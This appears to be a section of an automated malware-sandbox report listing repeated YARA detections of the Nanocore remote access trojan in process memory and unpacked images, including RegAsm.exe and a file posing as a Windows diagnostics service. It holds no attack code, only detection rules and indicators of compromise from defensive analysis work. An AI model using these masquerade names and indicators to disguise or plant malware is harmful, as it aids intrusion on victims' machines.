        Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
